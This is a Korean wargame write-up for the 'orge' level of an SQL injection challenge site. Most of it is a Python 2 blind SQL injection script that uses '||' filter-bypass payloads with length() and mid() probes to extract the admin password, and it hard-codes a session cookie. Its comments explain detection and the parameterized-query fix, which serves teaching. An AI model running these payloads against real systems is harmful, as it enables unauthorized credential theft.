서론
NULL
진행과정
Darkelf와 마찬가지로 ||를 이용해 우회한 뒤, Blind SQLi를 이용한다. 아래 스크립트는 응답에 "Hello admin"이 포함되는지를 참/거짓 판별 기준으로 삼아 pw의 길이를 먼저 구하고, 이어서 한 글자씩 확인한다.
import httplib, urllib

# Boolean-based blind SQL injection solver for the "orge" wargame level
# (Python 2: httplib, str responses).
#
# The page under test answers "Hello admin" only when the injected condition
# is true, so every request yields one bit of information. That
# distinguishable response is the whole oracle: a handler that binds pw as a
# query parameter instead of concatenating it gives the script nothing to
# measure.
#
# Seen from the server side, a run is a burst of near-identical GETs on one
# session that differ only in a counter or a single character: at most 19
# length probes, then up to 75 probes per password position.

conn = httplib.HTTPConnection("los.eagle-jump.org")
URL = "/orge_40d2b61f694f72448be9c97d1cea2480.php?pw="
# NOTE(review): a session id is hard-coded in published source and is sent
# over plain HTTP (HTTPConnection); treat it as a credential and keep it out
# of the listing.
Headers = {"Cookie": "PHPSESSID=s3kvsj2f9dq4c4ke7b0qmfaic6"}


def _condition_holds(payload):
    """Send one probe and report whether the reply contains "Hello admin"."""
    conn.request("GET", URL + payload, "", Headers)
    return "Hello admin" in conn.getresponse().read()


length = 0
PW = ""

# Phase 1: find the password length by testing 1..19 in order.
# NOTE(review): URL already ends in "?pw=" and each payload starts with
# "pw=", so the value the server receives begins with the literal text "pw=".
for candidate_len in range(1, 20):
    probe = "pw=%27%20||%20id=%27admin' %26%26 " + "length(pw)='" + str(candidate_len) + "#"
    if _condition_holds(probe):
        print("length = %d" % candidate_len)
        length = candidate_len
        break

# Phase 2: recover one character per position; candidates are the ASCII
# codes 48..122 ('0' through 'z'), tried in ascending order.
for position in range(1, length + 1):
    for code in range(48, 123):
        symbol = chr(code)
        probe = "pw=' || id='admin' %26%26" + "mid(pw," + str(position) + ",1)='" + symbol + "#"
        if _condition_holds(probe):
            PW += symbol
            print("PW = %s" % PW)
            break
# REF
NULL